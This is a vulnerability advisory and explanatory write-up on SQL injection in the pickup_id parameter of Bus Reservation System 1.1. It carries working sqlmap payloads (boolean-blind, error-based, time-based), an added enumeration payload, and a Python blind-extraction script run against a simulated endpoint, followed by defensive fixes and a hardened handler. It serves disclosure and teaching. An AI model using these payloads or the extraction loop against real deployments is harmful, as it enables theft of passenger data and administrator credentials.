Bus Reservation System 1.1 - Multiple-SQLi

Exploit Author: nu11secur1ty Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-09-04
## Title: Bus Reservation System-1.1 Multiple-SQLi
## Author: nu11secur1ty
## Date: 08/26/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://demo.phpjabbers.com/1693027053_628/preview.php?lid=1
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `pickup_id` parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the pickup_id parameter, and a
database error message was returned. You should review the contents of
the error message, and the application's handling of other input, to
confirm whether a vulnerability is present. An attacker can read
information from the whole database through this parameter.

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: pickup_id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT
(CASE WHEN (3959=3959) THEN 0x3927 ELSE (SELECT 8499 UNION SELECT
2098) END))&session_id=

    Type: error-based
    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT
(ELT(5210=5210,1))),0x716a6b7171),5210)&session_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT
2616 FROM (SELECT(SLEEP(15)))clIR)&session_id=
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Bus-Reservation-System-1.1-Multiple-SQLi)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/bus-reservation-system-11-multiple-sqli.html)

## Time spent:
00:25:00


Bus Reservation System 1.1: A Critical SQL Injection Vulnerability in the pickup_id Parameter

On August 26, 2023, security researcher nu11secur1ty published a high-critical SQL injection advisory for Bus Reservation System 1.1, a PHP booking script from PHPJabbers. The flaw, reported as Multiple SQL Injection (SQLi), sits in the pickup_id GET parameter of the pjActionGetLocations action, where attacker-controlled input reaches a database query without escaping, so an attacker can change what the query does and read data the application never meant to expose.

Understanding the Vulnerability: How SQL Injection Works

SQL injection occurs when an application fails to sanitize user input before incorporating it into database queries. This allows malicious actors to inject SQL commands that bypass authentication, extract sensitive data, or even alter database structures.

As the proof-of-concept shows, the pickup_id parameter is embedded in a SQL query without validation or escaping. When the payload ' is submitted, the application returns a database error instead of a normal response, the classic first sign of SQL injection.


controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id='&session_id=

A single unmatched quote breaks the syntax of the statement, which confirms that the input is spliced into the SQL text rather than bound as a value. The fact that the raw database error reaches the client also tells the attacker that error-based extraction will work, because whatever the database puts in its error text will be echoed back.

Exploitation Techniques: Multiple Attack Vectors

nu11secur1ty's sqlmap run identified three distinct SQLi techniques against the same parameter, each relying on a different signal (oracle) from the server:

  • Boolean-based blind SQLi: Uses conditional logic to infer database content based on response differences. For example:

pickup_id=(SELECT (CASE WHEN (3959=3959) THEN 0x3927 ELSE (SELECT 8499 UNION SELECT 2098) END))

This is sqlmap's "parameter replace" form. When the condition (here the always-true 3959=3959) holds, the CASE returns 0x3927, the hex encoding of the original parameter value, so the page looks exactly like the baseline. When it is false, the ELSE branch runs a scalar subquery that returns two rows, which MySQL rejects with "Subquery returns more than 1 row", so the page differs. By swapping in a condition such as ASCII(SUBSTRING((SELECT ...),1,1))>64, the attacker gets one true/false answer per request and can reconstruct any value the query's database user can read, character by character.

  • Error-based SQLi: Exploits MySQL’s error reporting to extract data. The payload uses GTID_SUBSET() to trigger an error containing injected data:

pickup_id=GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT(ELT(5210=5210,1))),0x716a6b7171),5210)

Here, 0x71626b7a71 is hexadecimal for qbkzq and 0x716a6b7171 for qjkqq; ELT(5210=5210,1) returns 1 because the condition is true. GTID_SUBSET() expects a GTID set and fails on the concatenated string with "Malformed GTID set specification", an error that quotes its argument. Because the application shows raw database errors, the marker-delimited value is returned to the attacker in a single request; replacing ELT(...) with any SELECT that yields a string turns the error message into a data channel.

  • Time-based blind SQLi: Uses delays to infer data. The payload introduces a SLEEP(15) command:

pickup_id=(SELECT 2616 FROM (SELECT(SLEEP(15)))clIR)

When the database evaluates this subquery it pauses for 15 seconds, a delay the attacker can measure from outside. Wrapping SLEEP() in a conditional (IF or CASE) turns the delay into a yes/no oracle, which is what makes the technique work even when true and false conditions produce byte-identical responses and no error text is visible.

Impact and Risk Assessment

Given the severity, this vulnerability is classified as High-Critical. The implications are severe:

| Attack type | What it yields | Exploitability |
|---|---|---|
| Boolean-based blind | Any value the query's database user can read, one true/false answer per request | High, as long as true and false conditions give distinguishable responses |
| Error-based | Data returned directly inside the database error text, many characters per request | Medium, requires the raw error to reach the client (it does here) |
| Time-based blind | The same as boolean-based, inferred from response delay | High, works even when response content and errors are identical |

Together these techniques let an attacker read whatever the application's database user can read. In a booking system that typically means passenger personal data, booking details and administrator credentials.

Real-World Use Case: Data Theft in Action

Imagine an attacker targeting a regional bus company using this system. With a time-based payload they can ask whether a specific record exists without seeing any content at all (the table name passengers is illustrative; the product's real schema is not part of the advisory):


pickup_id=(SELECT IF((SELECT COUNT(*) FROM passengers WHERE id=12345)>0, SLEEP(10), 0))

If the response takes about 10 seconds, passenger ID 12345 exists; if it returns immediately, it does not. Repeating this per ID enumerates which records exist, and replacing the condition with a comparison on ASCII(SUBSTRING(..., n, 1)) extracts each character of any column the same way, at one bit per request.

With the error-based technique the same names, addresses and e-mail addresses come back inside the GTID_SUBSET error text, many characters per request instead of one bit, for as long as the application keeps returning raw database errors to the client.
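The boolean- and time-based oracles described in the exploitation section and in the scenario above, as an added example that is not part of the advisory or the vendor's code. It simulates the vulnerable pickup_id handler with an in-memory SQLite database instead of MySQL (table names, sample rows and the SLEEP() stand-in are constructed assumptions), then runs the extraction loop an attacker would run against it: a CASE probe judged by response content, a CASE/SLEEP probe judged by latency, and a binary search over each character's code point. The one deliberate difference from the sqlmap payload is the ELSE branch: sqlmap's two-row subquery errors in MySQL but not in SQLite, so a non-existent id is used to make the false case differ.

```python
"""Blind SQL injection against a simulated pickup_id endpoint (added example).

Not the vendor's code: the endpoint, schema and data are constructed stand-ins
(SQLite in memory instead of MySQL) reproducing the vulnerable pattern described
in the advisory so the oracle loops can run offline.
"""
import sqlite3
import time

_conn = sqlite3.connect(":memory:")
# Constructed sample data; the schema and values are assumptions for the demo.
_conn.executescript("""
CREATE TABLE locations (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO locations VALUES (1, 'Central Station'), (2, 'Airport'), (6, 'Harbour');
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cr3t!');
""")
# SQLite has no SLEEP(); register a stand-in so time-based probes behave like MySQL's.
_conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)


def vulnerable_get_locations(pickup_id: str) -> str:
    """The vulnerable pattern: the raw GET parameter is spliced into the SQL text."""
    sql = f"SELECT name FROM locations WHERE id = {pickup_id}"
    try:
        rows = _conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"ERROR: {exc}"  # raw DB error, the signal the advisory's ' probe produced
    return ",".join(r[0] for r in rows)


def boolean_oracle(condition: str) -> bool:
    """True iff `condition` holds, judged from the response body alone.

    Same shape as sqlmap's 'parameter replace' payload: the THEN branch restores
    the original value (6) so the page matches the baseline; the ELSE branch does
    not (sqlmap uses a two-row subquery that errors in MySQL; SQLite tolerates it,
    so a non-existent id is used instead).
    """
    baseline = vulnerable_get_locations("6")
    probe = f"(SELECT CASE WHEN ({condition}) THEN 6 ELSE -1 END)"
    return vulnerable_get_locations(probe) == baseline


def time_oracle(condition: str, delay: float = 0.2) -> bool:
    """True iff `condition` holds, judged purely from latency (no content needed)."""
    probe = f"(SELECT CASE WHEN ({condition}) THEN SLEEP({delay}) ELSE 0 END)"
    start = time.monotonic()
    vulnerable_get_locations(probe)
    return time.monotonic() - start >= delay * 0.9


def extract_string(expr: str, oracle=boolean_oracle, max_len: int = 64) -> str:
    """Recover the value of scalar SQL expression `expr` one character at a time,
    binary-searching each code point (7 oracle calls per character).
    unicode()/substr() are SQLite's names for MySQL's ASCII()/SUBSTRING()."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        char_code = f"coalesce(unicode(substr(({expr}),{pos},1)),0)"
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"{char_code} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end of the string: substr() is empty, coalesce gives 0
            break
        out += chr(lo)
    return out


def record_exists(table: str, row_id: int) -> bool:
    """The scenario above: does a row exist? Answered from timing alone.
    `table` is an illustrative name, not a table known to be in the product."""
    return time_oracle(f"(SELECT count(*) FROM {table} WHERE id = {row_id}) > 0")


if __name__ == "__main__":
    print(vulnerable_get_locations("'"))                                   # raw error
    print(extract_string("SELECT username FROM users WHERE id = 1"))       # admin
    print(extract_string("SELECT password_hash FROM users WHERE id = 1"))  # s3cr3t!
    print(record_exists("users", 1), record_exists("users", 12345))        # True False
```

Against a real MySQL target the only changes are the transport (an HTTP GET with the probe in pickup_id), the comparison function names, and the oracle's notion of "same as baseline", which for sqlmap's payload is "no subquery error". The cost model is the point: seven requests per character with the boolean or time oracle, versus one request per string with the error-based form, which is why leaving raw database errors visible is so much worse than the blind case.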

Security Recommendations and Fixes

Developers must address this flaw immediately. Recommended fixes include:

  • Input validation: Validate every user input against what it is supposed to be before it reaches a query. Escaping with mysqli_real_escape_string() is only a fallback for legacy code and only works inside a correctly quoted string literal; it does nothing for a bare numeric value such as pickup_id.
  • Parameterized queries: Replace direct string concatenation with prepared statements:

$pickup_id = filter_var($_GET['pickup_id'] ?? '', FILTER_VALIDATE_INT); // reject non-integers early
if ($pickup_id === false) { http_response_code(400); exit; }
$stmt = $mysqli->prepare("SELECT * FROM locations WHERE id = ?");
$stmt->bind_param("i", $pickup_id);   // bound as data, never spliced into the SQL text
$stmt->execute();
$result = $stmt->get_result();         // then $result->fetch_assoc() per row

This ensures that user input is treated as data, not executable code.

  • Whitelist validation: Accept only a decimal integer for pickup_id and answer anything else with a 400 before a query is built; every payload in the advisory contains parentheses, quotes or letters and would be refused by that check alone.
  • Hide database errors: In production set display_errors=Off and log exceptions server-side instead of returning them to the client. This does not fix the injection, but it removes the error-based channel and forces an attacker back to slow blind techniques.
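The hardened handler the recommendations above describe, as an added example rather than PHPJabbers' code (the table name and the shape of the request are assumptions). It applies the whitelist first and then binds the validated value as a parameter, and it checks the three payload bodies from the advisory against both layers: the whitelist refuses them outright, and even with the whitelist skipped a bound parameter is compared as a value rather than parsed as SQL.

```python
"""Hardened pickup_id handler (added example, not the vendor's code).

Whitelist validation plus a bound parameter, shown with SQLite in memory;
the table name and sample rows are constructed assumptions for the demo.
"""
import re
import sqlite3

# Decimal integer only: no quotes, spaces, parentheses or function names can pass.
_PICKUP_ID_RE = re.compile(r"[0-9]{1,10}")

_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE locations (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO locations VALUES (1, 'Central Station'), (6, 'Harbour');
""")

# The three payload bodies from the advisory, used here only as test input.
ADVISORY_PAYLOADS = [
    "(SELECT (CASE WHEN (3959=3959) THEN 0x3927 ELSE (SELECT 8499 UNION SELECT 2098) END))",
    "GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT (ELT(5210=5210,1))),0x716a6b7171),5210)",
    "(SELECT 2616 FROM (SELECT(SLEEP(15)))clIR)",
]


def parse_pickup_id(raw: str) -> int:
    """Whitelist check: anything but a short decimal integer is a 400, not a query."""
    if not _PICKUP_ID_RE.fullmatch(raw):
        raise ValueError(f"invalid pickup_id: {raw!r}")
    return int(raw)


def safe_get_locations(raw_pickup_id: str) -> list:
    """Validated value bound as a parameter; the SQL text itself never changes."""
    pickup_id = parse_pickup_id(raw_pickup_id)
    rows = _conn.execute("SELECT name FROM locations WHERE id = ?", (pickup_id,)).fetchall()
    return [r[0] for r in rows]


def rejected(raw: str) -> bool:
    """True when the input is refused by the whitelist before any SQL runs."""
    try:
        parse_pickup_id(raw)
    except ValueError:
        return True
    return False


def bound_as_data(raw: str) -> list:
    """Defence in depth: with the whitelist skipped, a bound parameter is still
    compared as a value, so the payloads match nothing and raise no SQL error."""
    rows = _conn.execute("SELECT name FROM locations WHERE id = ?", (raw,)).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    print(safe_get_locations("6"))                                  # ['Harbour']
    print([rejected(p) for p in ADVISORY_PAYLOADS])                 # [True, True, True]
    print([bound_as_data(p) for p in ADVISORY_PAYLOADS])            # [[], [], []]
```

Keeping both layers matters: the whitelist gives a clean 400 and a log line for the scanner traffic, while the bound parameter means a future code path that forgets the check still cannot be turned into a query. Neither layer depends on the database hiding its errors, so display_errors=Off remains a separate, additional control.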

Conclusion: A Wake-Up Call for Open-Source Security

The Bus Reservation System 1.1 vulnerability is a reminder that a mundane lookup parameter in a commercial PHP script can expose the whole database. Without validation and parameterized queries, a single GET parameter is enough to read every table the application's database user can reach.

Organizations running this PHPJabbers product should check with the vendor for a fixed release, audit their deployments for the pjActionGetLocations endpoint, and in the meantime suppress database error output and restrict or monitor requests carrying non-numeric pickup_id values. For developers the lesson is the usual secure-by-design one: never trust user input, validate it against what it should be, and bind it as a parameter rather than building SQL from strings.

Vulnerabilities of this kind will keep appearing in web applications that concatenate user input into queries. The defence is proactive: code review for string-built SQL, automated scanning of every parameter, and the habit of treating every error message shown to a client as a potential data channel.